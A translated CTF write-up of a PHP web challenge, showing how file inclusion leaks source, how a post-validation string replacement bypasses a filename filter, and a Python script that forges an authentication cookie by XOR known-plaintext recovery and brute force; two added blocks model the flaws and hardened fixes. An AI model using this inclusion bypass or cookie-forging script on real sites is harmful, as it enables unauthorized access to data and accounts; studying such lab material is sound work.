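"Baidu Cup" CTF, September Round: code
First, open the challenge environment on i春秋 (ichunqiu).
Open the link, emmmmmmm (that's my little sister, runs away~)
Seriously though, jpg=hei.jpg is obviously a file inclusion.
Let's look at the page source behind the picture first.
What comes back is the image, base64-encoded.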
<title>file:hei.jpg</title><img src='data:image/gif;base64,…'></img>
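Using the file inclusion, let's look at the contents of index.php.
url:http://16f8b7fc777444e38af9e234404cec95d069d121e5d7435a.game.ichunqiu.com/index.php?jpg=index.php
The response is a broken image, which doesn't matter. View the page source, copy it, and delete the underlined part.
Base64-decode what is left.
The result is a piece of PHP code. It filters the value passed in the jpg parameter: only upper- and lower-case letters and digits are allowed, and anything else is replaced with an empty string.
There is one more interesting detail: it replaces the string config with "_".
But what do we do next? A comment in the code says it was written with PhpStorm. I looked it up on Baidu: it is a compiler-like development tool along the lines of Eclipse or VS. (I don't do development, so I can write code in Notepad 23333)
PhpStorm has one problem: it leaves a .idea folder in the project.
Build a URL to request the file .idea/workspace.xml:
http://16f8b7fc777444e38af9e234404cec95d069d121e5d7435a.game.ichunqiu.com/.idea/workspace.xml
Two files stand out: fl3g_ichuqiu.php, which is obviously the name of the flag file, and config.php.
Visiting both directly, config.php returns nothing and fl3g_ichuqiu.php shows "╮(╯▽╰)╭".
Let's read them through the file inclusion instead.
Because the _ in fl3g_ichuqiu.php gets stripped, and config gets replaced with _, neither file can be read the normal way.
But precisely because config is replaced with "_", we can use config to construct fl3g_ichuqiu.php.
url:
http://16f8b7fc777444e38af9e234404cec95d069d121e5d7435a.game.ichunqiu.com/index.php?jpg=fl3gconfigichuqiu.php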
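The filter ordering described above, modelled as an added example (this is not the challenge's index.php, which the write-up does not reproduce). It assumes "." is also allowed by the filter; `described_filter`, `breaks_own_policy`, `resolve_image` and the allow-list are hypothetical names. It shows why a rewrite that runs after validation defeats the validation, next to an allow-list lookup that avoids building a path from input.

```python
import re

# Assumption: letters, digits and "." pass the filter; everything else is dropped.
FORBIDDEN = re.compile(r"[^a-zA-Z0-9.]")


def described_filter(name: str) -> str:
    """Filter as the write-up describes it: strip first, then rewrite "config"."""
    stripped = FORBIDDEN.sub("", name)       # step 1: drop disallowed characters
    return stripped.replace("config", "_")   # step 2: runs after step 1 has finished


def breaks_own_policy(name: str) -> bool:
    """True when the final output contains a character step 1 was meant to remove."""
    return FORBIDDEN.search(described_filter(name)) is not None


# Hardened alternative: the parameter is only a lookup key, never part of a path.
ALLOWED_IMAGES = {"hei.jpg": "images/hei.jpg"}  # constructed allow-list


def resolve_image(requested: str):
    """Return the fixed path for a known image name, or None for anything else."""
    return ALLOWED_IMAGES.get(requested)


if __name__ == "__main__":
    samples = ("hei.jpg", "index.php", "config.php",
               "fl3g_ichuqiu.php", "fl3gconfigichuqiu.php")
    for sample in samples:
        print(sample, "->", described_filter(sample),
              "| policy broken:", breaks_own_policy(sample),
              "| allow-list:", resolve_image(sample))
```

Running `breaks_own_policy` over a list of test inputs is a cheap regression check for any sanitizer that transforms its input after validating it.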
Decode it the same way as for index.php above:
<?php
/**
 * Created by PhpStorm.
 * Date: 2015/11/16
 * Time: 1:31
 */
error_reporting(E_ALL || ~E_NOTICE);
include('config.php');
function random($length, $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz') {
    $hash = '';
    $max = strlen($chars) - 1;
    for($i = 0; $i < $length; $i++) {
        $hash .= $chars[mt_rand(0, $max)];
    }
    return $hash;
}
function encrypt($txt,$key){
    for($i=0;$i<strlen($txt);$i++){
        $tmp .= chr(ord($txt[$i])+10);
    }
    $txt = $tmp;
    $rnd=random(4);
    $key=md5($rnd.$key);
    $s=0;
    for($i=0;$i<strlen($txt);$i++){
        if($s == 32) $s = 0;
        $ttmp .= $txt[$i] ^ $key[++$s];
    }
    return base64_encode($rnd.$ttmp);
}
function decrypt($txt,$key){
    $txt=base64_decode($txt);
    $rnd = substr($txt,0,4);
    $txt = substr($txt,4);
    $key=md5($rnd.$key);
    $s=0;
    for($i=0;$i<strlen($txt);$i++){
        if($s == 32) $s = 0;
        $tmp .= $txt[$i]^$key[++$s];
    }
    for($i=0;$i<strlen($tmp);$i++){
        $tmp1 .= chr(ord($tmp[$i])-10);
    }
    return $tmp1;
}
$username = decrypt($_COOKIE['user'],$key);
if ($username == 'system'){
    echo $flag;
}else{
    setcookie('user',encrypt('guest',$key));
    echo "╮(╯▽╰)╭";
}
?>
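The result is code showing how the encryption works, and it confirms that the flag is in the $flag variable of config.php.
To get the flag printed, the decrypted username has to equal 'system'.
random() generates a string of random characters.
encrypt($txt, $key) encrypts $txt with key.
decrypt($txt, $key) decrypts $txt with key.
Both encryption and decryption here use bitwise XOR, which has a useful property. If
A = C ^ B
then
C = A ^ B
So we can run the decryption logic to recover the first 5 characters of the key, and brute-force the last one. Once we know the key, we encrypt with it to turn the user value in the cookie into system.
We take the structure of this session's cookie from a browser plugin. It doesn't matter that the value differs, as long as the length and character range are the same.
Write the Python script: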
import base64
import requests

crypt = 'Y0o1dUJLC01N'  # value of the user cookie issued for guest
text = 'guest'

crypt = base64.b64decode(crypt)
rnd = crypt[0:4]    # 4-character random prefix
crypt = crypt[4:]   # XORed body

# Apply the same +10 shift that encrypt() applies to the plaintext
tmp = ''
for i in range(5):
    tmp += chr(ord(text[i]) + 10)

key = ''
for i in range(5):
    key += chr(ord(tmp[i]) ^ crypt[i])
# At this point we have the first 5 characters of the key used for this cookie;
# next we use the key on system

cookies = []
system = 'system'
tt = ''
for i in range(6):
    tt += chr(ord(system[i]) + 10)

# The range is 0-9 and a-f because md5 returns a hexadecimal string
for c in '0123456789abcdef':
    true_key = key + c
    tmp = ''
    for i in range(6):
        tmp += chr(ord(true_key[i]) ^ ord(tt[i]))
    cookies.append(base64.b64encode(rnd + tmp.encode('latin-1')).decode())

for value in cookies:
    cookie = {'user': value}
    r = requests.session()
    result = r.get('http://16f8b7fc777444e38af9e234404cec95d069d121e5d7435a.game.ichunqiu.com/fl3g_ichuqiu.php', cookies=cookie)
    print(result.text)
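If you want to use the script above, delete the comments. I don't know why having the comment there causes an error....
Result of the run
Found the flag. I don't know why submitting it on i春秋 keeps failing; maybe this is a fake flag (lol)
Author's ramblings: I used to just grab the Python script whenever someone else's writeup had one. This time I forced myself to read through the code and write down what I learned. For this challenge, we know that MD5 produces a 32-character combination of 0~f, which is why the range is 16 characters when brute-forcing the last character. Next, we use the user value from the cookie we received to work out the first 5 characters of the MD5-hashed key; the key has 32 characters in total. Then we use the first 5 characters of the key plus 1 brute-forced character to decrypt system. The rnd here is the first 4 characters of the user value and is randomly generated by the system, but the MD5 value of our key depends on it, so at the end rnd also has to be concatenated with the decrypted value.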
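The cookie weakness discussed above, modelled offline as an added example (not the challenge's code and not the author's script). `SECRET`, `RND` and all function names are constructed; the HMAC-SHA256 signed cookie is one standard fix chosen here, not something the page uses. It shows that the XOR scheme accepts a value rewritten without the secret, while an authenticated cookie rejects the same tampering.

```python
import base64
import hashlib
import hmac

SECRET = b"constructed-demo-secret"  # constructed stand-in for $key in config.php
RND = b"AbC1"                        # constructed 4-character random prefix
HEX = b"0123456789abcdef"


def keystream(rnd, secret):
    # md5($rnd.$key) as hex text; the PHP loop reads $key[++$s], so index 0 is skipped.
    return hashlib.md5(rnd + secret).hexdigest().encode()[1:]


def weak_encrypt(txt, secret, rnd):
    # Model of encrypt() for inputs under 32 bytes: shift by 10, then XOR.
    body = bytes(((b + 10) & 0xFF) ^ k for b, k in zip(txt, keystream(rnd, secret)))
    return base64.b64encode(rnd + body).decode()


def weak_decrypt(cookie, secret):
    raw = base64.b64decode(cookie)
    rnd, body = raw[:4], raw[4:]
    return bytes(((b ^ k) - 10) & 0xFF for b, k in zip(body, keystream(rnd, secret)))


def rewrite_candidates(cookie, known, wanted):
    # Uses no secret: known plaintext exposes len(known) keystream bytes, and the
    # one extra byte can only be one of 16 hex characters.
    if len(wanted) != len(known) + 1:
        raise ValueError("model covers exactly one unknown keystream byte")
    raw = base64.b64decode(cookie)
    rnd, body = raw[:4], raw[4:]
    ks = bytes(((p + 10) & 0xFF) ^ c for p, c in zip(known, body))
    shifted = bytes((w + 10) & 0xFF for w in wanted)
    return [base64.b64encode(rnd + bytes(s ^ k for s, k in zip(shifted, ks + bytes([g])))).decode()
            for g in HEX]


def signed_cookie(value, secret):
    # Hardened form: the value travels with an HMAC tag over its exact bytes.
    tag = hmac.new(secret, value, hashlib.sha256).hexdigest()
    return base64.urlsafe_b64encode(value).decode() + "." + tag


def read_signed_cookie(cookie, secret):
    try:
        payload, tag = cookie.rsplit(".", 1)
        value = base64.urlsafe_b64decode(payload)
    except ValueError:  # missing separator or invalid base64
        return None
    expected = hmac.new(secret, value, hashlib.sha256).hexdigest()
    return value if hmac.compare_digest(tag.encode(), expected.encode()) else None


def weak_scheme_accepts_rewrite():
    guest = weak_encrypt(b"guest", SECRET, RND)
    hits = [c for c in rewrite_candidates(guest, b"guest", b"system")
            if weak_decrypt(c, SECRET) == b"system"]
    return len(hits)


def signed_scheme_accepts_rewrite():
    tag = signed_cookie(b"guest", SECRET).rsplit(".", 1)[1]
    forged = base64.urlsafe_b64encode(b"system").decode() + "." + tag
    return read_signed_cookie(forged, SECRET) is not None


if __name__ == "__main__":
    print("weak scheme, rewritten cookies accepted:", weak_scheme_accepts_rewrite())
    print("signed scheme, rewritten cookie accepted:", signed_scheme_accepts_rewrite())
```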